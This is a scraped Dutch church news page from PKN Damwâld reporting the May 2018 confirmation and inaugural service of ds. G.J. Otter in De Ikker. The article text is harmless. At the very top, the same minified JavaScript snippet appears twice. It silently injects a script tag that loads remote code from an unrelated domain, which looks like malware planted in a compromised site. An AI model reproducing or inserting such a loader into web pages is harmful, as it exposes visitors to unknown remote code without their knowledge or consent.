;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Een nieuw begin ... bevestiging & intrede van ds. G.J. Otter - PKN Damwâld

Een nieuw begin … bevestiging & intrede van ds. G.J. Otter

Gepubliceerd op: zondag 13 mei 2018

Zondagmiddag 13 mei, even voor drie uur, een welkom voor genodigden bij de deur, vele handen schudden, herkenning en hier en daar een omhelzing om een vreugdevol weerzien na lange tijd, gauw even langs het toilet, een laatste blik in de spiegel, de kerkzaal in… en dan is het eindelijk zover… leden en genodigden van de Hervormd Akkerwoude c.a. maken zich op om de predikant op zijn nieuwe werkplek te verwelkomen. Alles en iedereen staat klaar. Voorin de kerk staan feestelijke lenteboeketten. Het ís ook feest! Feest om de bevestiging en intrede, die zal plaatsvinden in De Ikker, want na een jaar vacant te zijn geweest kijkt de gemeente reikhalzend uit naar hun nieuwe predikant: ds. G.J. Otter.

In een feestelijke bevestiging- en intrededienst werd ds. G.J. Otter in De Ikker in Damwâld als predikant verbonden aan Hervormd Akkerwoude c.a. De bevestiging werd verricht door collega en vriend ds. H. Dekker, predikant van de Protestantse Gemeente Marken.
Na de woorden van bevestiging sprak ds. Dekker de zegen uit onder handoplegging. Met die handeling werd het een feit: Hervormd Akkerwoude, Murmerwoude, Broeksterwoude en De Valom heeft weer een eigen herder en leraar! Vervolgens hield ds. Otter zijn intredepreek. Als centraal thema van de preek koos hij: ‘Dat Gods schat (vruchten van de Geest) in ons onvolkomen leven mag stralen’, gebaseerd op de tekst uit 2 Korintiërs 3: 17 – 4: 18

Sytse de Boer, voorzitter van de kerkenraad, sprak  – met een mooie verwijzing naar 1 Korintiërs 13, vers 13 – namens de gemeente uit er alle vertrouwen in te hebben dat dominee Otter met zijn kennis en ervaring op een authentieke wijze invulling zal geven aan zijn predikantsschap in Damwâld en omstreken.

Tijdens de receptie in aansluiting op de dienst werd ds. Otter toegesproken door burgemeester N.L. Agricola van de Gemeente Dantumadiel, ds. S. Boukes, predikant van de Gereformeerd Kerk Damwâld, consulent ds. W.L. de Jong, dhr. J. Klimstra van Gereformeerd Broeksterwâld en mw. M. Telgenhof-Otter, de zus van ds. Otter. Tot slot sprak ds. Otter, mede namens zijn gezin, zelf een dankwoord uit voor de gezegende dag, de organisatie en de mensen die naar zijn bevestiging en intrede zijn gekomen.

Dominee Otter verruilde na 13 jaar de wijkgemeente Ontmoeting Hervormd West van de Protestantse Gemeente Emmeloord voor Hervormd Akkerwoude c.a. Hij volgt daarmee ds. G. Timmer op, die na zes fijne en inspirerende jaren een beroep aannam naar de Hervormd Twijzelerheide. Met de komst van ds. Otter werd  zoals al gezegd een vacante periode afgesloten van een jaar. In de persoon van ds. Otter meent Hervormd Akkerwoude c.a. een predikant te hebben gevonden die de gemeente (opnieuw) kan inspireren. Ds. Otter past bij de gemeente en bij onze situatie. Een bewogen mens, openstaand voor de ander, jong van geest en energiek. Wij zijn dankbaar voor de trouw, de betrokkenheid en de inzet binnen van al onze gemeenteleden gedurende deze tijd. Maar we zijn niet minder blij en dankbaar dat onze God ons nu een nieuwe herder en leraar schenkt. Vanuit dat geloof zien wij de toekomst met vertrouwen tegemoet. Wij hopen en bidden dat wij samen, als gemeente en nieuwe predikant, een goede tijd mogen ontvangen. Dat ds. Otter tot zegen in zijn nieuwe gemeente mag werken als herder en leraar. Wij kunnen in ieder geval terugzien op een bijzonder en feestelijk begin.